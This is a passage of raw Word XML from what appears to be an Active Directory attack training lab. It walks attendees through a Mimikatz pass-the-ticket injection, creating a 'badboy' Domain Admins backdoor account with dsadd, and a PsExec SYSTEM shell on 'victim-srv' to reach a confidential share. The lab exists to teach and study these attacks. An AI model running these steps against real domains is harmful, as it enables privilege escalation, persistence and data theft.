      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and identify an item for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>sccmagent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> account for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>krbtgt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002E7D8E">
        <w:t>, like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2050DC22" w14:textId="6CC7D779" w:rsidR="009B5DFF" w:rsidRDefault="003C38D6" w:rsidP="00416A9B">
      <w:pPr>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C38D6">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="62355C65" wp14:editId="3426751F">
            <wp:extent cx="2943247" cy="2428893"/>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47" cy="2428893"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A233B8" w14:textId="082A1F4A" w:rsidR="003C38D6" w:rsidRDefault="003C38D6" w:rsidP="00416A9B"/>
    <w:p w14:paraId="52FEFC6D" w14:textId="288B4325" w:rsidR="001927EA" w:rsidRDefault="001927EA" w:rsidP="00D86DFB">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Open then a second elevated privileges </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and enter command: '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>dsadd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> user "CN=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>badboy,CN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Users,DC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>contoso,DC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>=lab" -disabled no -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> MyStr0ng!Mdp -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>memberof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> "CN=Domain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Admins,CN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Users,DC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>contoso,DC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>=lab"</w:t>
      </w:r>
      <w:r w:rsidRPr="001927EA">
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t>. You should have an access denied.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFDC2E2" w14:textId="77777777" w:rsidR="001927EA" w:rsidRPr="003C38D6" w:rsidRDefault="001927EA" w:rsidP="00416A9B"/>
    <w:p w14:paraId="2845659C" w14:textId="5CF6C773" w:rsidR="003C38D6" w:rsidRDefault="003C38D6" w:rsidP="00D86DFB">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="003C38D6">
        <w:t xml:space="preserve">Back in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002E7D8E">
        <w:t>M</w:t>
      </w:r>
      <w:r w:rsidRPr="003C38D6">
        <w:t>imikatz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C38D6">
        <w:t xml:space="preserve"> enter command</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D89300B" w14:textId="2E7177B1" w:rsidR="003C38D6" w:rsidRPr="003C38D6" w:rsidRDefault="003C38D6" w:rsidP="003C38D6">
      <w:pPr>
        <w:ind w:firstLine="720"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003C38D6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Kerberos::</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003C38D6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ptt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00EC0AF4">
        <w:rPr>
          <w:b/>
          <w:i/>
        </w:rPr>
        <w:t>&lt;file name&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (e.g. “Kerberos</w:t>
      </w:r>
      <w:r w:rsidR="001927EA">
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ptt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003C38D6">
        <w:t>[0;d5a14]-2-0-40e10000-sccmagent@krbtgt-CONTOSO.LAB.kirbi</w:t>
      </w:r>
      <w:r>
        <w:t>”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEDB95B" w14:textId="77777777" w:rsidR="002576B5" w:rsidRDefault="002576B5" w:rsidP="00416A9B">
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:noProof/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="19EDF54E" wp14:editId="4799C96C">
            <wp:extent cx="4471987" cy="698748"/>
            <wp:effectExtent l="0" t="0" r="5080" b="6350"/>
            <wp:docPr id="28" name="Image 28" descr="Texte de remplacement généré par une machine :&#10;mimikatz 2.1.1 x64 (oe.eo) &#10;mimikatz # kerberos: : ptt (e; &#10;* File: LAB :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mimikatz 2.1.1 x64 (oe.eo) &#10;mimikatz # kerberos: : ptt (e; &#10;* File: LAB : OK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1125" cy="709551"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="744B5E6E" w14:textId="520990F3" w:rsidR="002576B5" w:rsidRDefault="002576B5" w:rsidP="00416A9B"/>
    <w:p w14:paraId="5C3A6273" w14:textId="594FC427" w:rsidR="004536BC" w:rsidRDefault="001927EA" w:rsidP="00D86DFB">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="24"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Return to the second elevated privileges </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> and run again the command '</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>dsadd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> user "CN=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>badboy,CN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Users,DC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>contoso,DC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>=lab" -disabled no -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>pwd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> MyStr0ng!Mdp -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>memberof</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> "CN=Domain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Admins,CN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Users,DC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>contoso,DC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>=lab"</w:t>
      </w:r>
      <w:r w:rsidRPr="001927EA">
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7944FA7D" w14:textId="6424FCDC" w:rsidR="001927EA" w:rsidRDefault="001927EA"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1927EA" w14:paraId="53DA2C52"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64A84EC" w14:textId="77777777" w:rsidR="001927EA" w:rsidRDefault="001927EA" w:rsidP="00457366">
            <w:r>
              <w:t>CHECK POINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="001927EA" w14:paraId="5A9F0F93"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E336C7" w14:textId="1E339470" w:rsidR="001927EA" w:rsidRDefault="001927EA" w:rsidP="00457366">
            <w:bookmarkStart w:id="34" w:name="_Hlk524107413"/>
            <w:r>
              <w:t>Are you able to create a domain account member of the Domain Admins group</w:t>
            </w:r>
            <w:r w:rsidRPr="00F45770">
              <w:t>?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6EB96D32" w14:textId="121D92EC" w:rsidR="001927EA" w:rsidRDefault="001927EA" w:rsidP="00457366">
            <w:r>
              <w:t xml:space="preserve">In </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>cmd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> where you run the </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>dsadd</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> command, run the command “</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>klist</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>” and take a screen shot of the result</w:t>
            </w:r>
            <w:bookmarkEnd w:id="34"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="47970673" w14:textId="77777777" w:rsidR="000C6667" w:rsidRDefault="000C6667" w:rsidP="0013017C"/>
    <w:p w14:paraId="324546D8" w14:textId="468D3CBF" w:rsidR="00A01861" w:rsidRDefault="00A01861">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C42854" w14:textId="23D2DD99" w:rsidR="00FC1DDD" w:rsidRDefault="001D46F2" w:rsidP="00FC1DDD">
      <w:pPr>
        <w:pStyle w:val="Titre4"/>
      </w:pPr>
      <w:bookmarkStart w:id="35" w:name="_Hlk524107610"/>
      <w:bookmarkStart w:id="36" w:name="_Toc44075685"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">Task </w:t>
      </w:r>
      <w:r w:rsidR="00D86DFB">
        <w:t>7</w:t>
      </w:r>
      <w:r w:rsidR="00FC1DDD">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidR="00F708C0">
        <w:t xml:space="preserve">Use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00631645">
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00631645">
        <w:t xml:space="preserve"> to remote access </w:t>
      </w:r>
      <w:r w:rsidR="006C4FF0">
        <w:t>share</w:t>
      </w:r>
      <w:bookmarkEnd w:id="36"/>
    </w:p>
    <w:bookmarkEnd w:id="35"/>
    <w:p w14:paraId="192F4D39" w14:textId="006DFD87" w:rsidR="000C6667" w:rsidRPr="000C6667" w:rsidRDefault="000C6667" w:rsidP="000C6667">
      <w:r w:rsidRPr="006C4FF0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve">In this part attendees will use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>psexec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>Sysinternal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t xml:space="preserve"> Tool to remotely on server change NTFS permissions</w:t>
      </w:r>
      <w:r w:rsidRPr="006C4FF0">
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="416050EA" w14:textId="270CE5B8" w:rsidR="00D86DFB" w:rsidRDefault="00D86DFB" w:rsidP="008A5CFA">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Connect on VICTIM-PC using the domain administrator account created in previous step</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D58CFA" w14:textId="5A1A30E6" w:rsidR="00D86DFB" w:rsidRPr="00D86DFB" w:rsidRDefault="00D86DFB" w:rsidP="00D86DFB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Account: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>badboy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="39D2CE35" w14:textId="4CF402C0" w:rsidR="00D86DFB" w:rsidRPr="00D86DFB" w:rsidRDefault="00D86DFB" w:rsidP="00D86DFB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Domain: CONTOSO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="481A7071" w14:textId="408EF40C" w:rsidR="00D86DFB" w:rsidRPr="00D86DFB" w:rsidRDefault="00D86DFB" w:rsidP="00D86DFB">
      <w:pPr>
        <w:spacing w:after="0"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Password: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D86DFB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
        </w:rPr>
        <w:t>MyStr0ng!Mdp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="500C8AB7" w14:textId="77777777" w:rsidR="00D86DFB" w:rsidRDefault="00D86DFB" w:rsidP="00D86DFB"/>
    <w:p w14:paraId="1AD24069" w14:textId="2E02849B" w:rsidR="00FD628E" w:rsidRDefault="00FD628E" w:rsidP="008A5CFA">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Browse to </w:t>
      </w:r>
      <w:hyperlink r:id="rId47" w:history="1">
        <w:r w:rsidRPr="009D647E">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>\\contoso.lab\hr\restricted</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> share</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A5FEC8" w14:textId="272AD5F6" w:rsidR="00FD628E" w:rsidRDefault="00FD628E" w:rsidP="00FD628E">
      <w:r>
        <w:t>You should not have permission to access this share:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="315EF49E" w14:textId="32466A96" w:rsidR="00FD628E" w:rsidRDefault="00FD628E" w:rsidP="00FD628E">
      <w:r w:rsidRPr="00FD628E">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27B1F2D4" wp14:editId="70BD893A">
            <wp:extent cx="3514751" cy="176690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751" cy="1766900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5273C15A" w14:textId="3956EDC6" w:rsidR="00FD628E" w:rsidRDefault="00FD628E" w:rsidP="00FD628E"/>
    <w:p w14:paraId="56EC9FF7" w14:textId="7438F0F2" w:rsidR="00FD628E" w:rsidRDefault="00FD628E" w:rsidP="00FD628E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Identify where the path </w:t>
      </w:r>
      <w:hyperlink r:id="rId49" w:history="1">
        <w:r w:rsidRPr="009D647E">
          <w:rPr>
            <w:rStyle w:val="Lienhypertexte"/>
          </w:rPr>
          <w:t>\\contoso.lab\hr\restricted</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> really points to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD00F7E" w14:textId="3BFEC719" w:rsidR="00B469A0" w:rsidRDefault="00FD628E" w:rsidP="00FD628E">
      <w:r>
        <w:t xml:space="preserve">From elevated </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> enter command “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FD628E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>dfsutil</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00FD628E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00FD628E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>pktinfo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>” and look at results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE83881" w14:textId="3828D7A2" w:rsidR="00FD628E" w:rsidRDefault="00FD628E"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FD628E" w14:paraId="0FE04107"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7ACC6F8C" w14:textId="77777777" w:rsidR="00FD628E" w:rsidRDefault="00FD628E" w:rsidP="00457366">
            <w:r>
              <w:t>CHECK POINT</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FD628E" w14:paraId="2A232886"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0AA8E56" w14:textId="1DC612E5" w:rsidR="00FD628E" w:rsidRDefault="00FD628E" w:rsidP="00457366">
            <w:bookmarkStart w:id="37" w:name="_Hlk533195936"/>
            <w:r>
              <w:t xml:space="preserve">Which share the DFS namespace </w:t>
            </w:r>
            <w:hyperlink r:id="rId50" w:history="1">
              <w:r w:rsidRPr="009D647E">
                <w:rPr>
                  <w:rStyle w:val="Lienhypertexte"/>
                </w:rPr>
                <w:t>\\contoso.lab\hr\restricted</w:t>
              </w:r>
            </w:hyperlink>
            <w:r>
              <w:t xml:space="preserve"> points to?</w:t>
            </w:r>
            <w:bookmarkEnd w:id="37"/>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1D708A3E" w14:textId="025E683E" w:rsidR="00FD628E" w:rsidRDefault="00FD628E" w:rsidP="00FD628E"/>
    <w:p w14:paraId="39C758CE" w14:textId="27511A27" w:rsidR="00D80ABA" w:rsidRDefault="008F73F0" w:rsidP="00C6425D">
      <w:r>
        <w:t>From</w:t>
      </w:r>
      <w:r w:rsidR="005E589A">
        <w:t xml:space="preserve"> elevated CMD and </w:t>
      </w:r>
      <w:r w:rsidR="00D86DFB">
        <w:t>run commands</w:t>
      </w:r>
      <w:r w:rsidR="000F2D31">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645F83B6" w14:textId="3FA72CC8" w:rsidR="008F73F0" w:rsidRPr="008F73F0" w:rsidRDefault="008F73F0" w:rsidP="008F73F0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="008F73F0">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidRPr="008F73F0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>copy c:\hack\SysinternalsSuite\subinacl.exe \\victim-srv\c$</w:t>
      </w:r>
      <w:r w:rsidR="009A598E">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>\_Tools</w:t>
      </w:r>
      <w:r w:rsidRPr="008F73F0">
        <w:t>" to co</w:t>
      </w:r>
      <w:r>
        <w:t>py subinacl.exe on remote machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417993CF" w14:textId="527A34C8" w:rsidR="000F2D31" w:rsidRDefault="000F2D31" w:rsidP="008F73F0">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Run </w:t>
      </w:r>
      <w:r w:rsidR="008F73F0">
        <w:t>"</w:t>
      </w:r>
      <w:r w:rsidR="008F73F0" w:rsidRPr="008F73F0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>C:\hack\SysinternalsSuite\psexec</w:t>
      </w:r>
      <w:r w:rsidR="00885CF6" w:rsidRPr="008F73F0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>.exe</w:t>
      </w:r>
      <w:r w:rsidR="008F73F0" w:rsidRPr="008F73F0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> \\victim-srv -s </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008F73F0" w:rsidRPr="008F73F0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008F73F0">
        <w:t>" to remotely connect on VICTIM-SRV machine using the NT AUHTORITY\System built-in account.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B3A20A1" w14:textId="2FAAADF5" w:rsidR="008F73F0" w:rsidRDefault="008F73F0" w:rsidP="00C6425D">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Identify the local path shared with name CONFIDENTIAL using command "</w:t>
      </w:r>
      <w:r w:rsidRPr="008F73F0">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>net share</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FB94059" w14:textId="76C9F925" w:rsidR="005E589A" w:rsidRDefault="008F73F0" w:rsidP="009A598E">
      <w:pPr>
        <w:pStyle w:val="Paragraphedeliste"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="8"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Dump permission of </w:t>
      </w:r>
      <w:r w:rsidRPr="008F73F0">
        <w:t>C:\_DATA\CONFIDENTIAL</w:t>
      </w:r>
      <w:r>
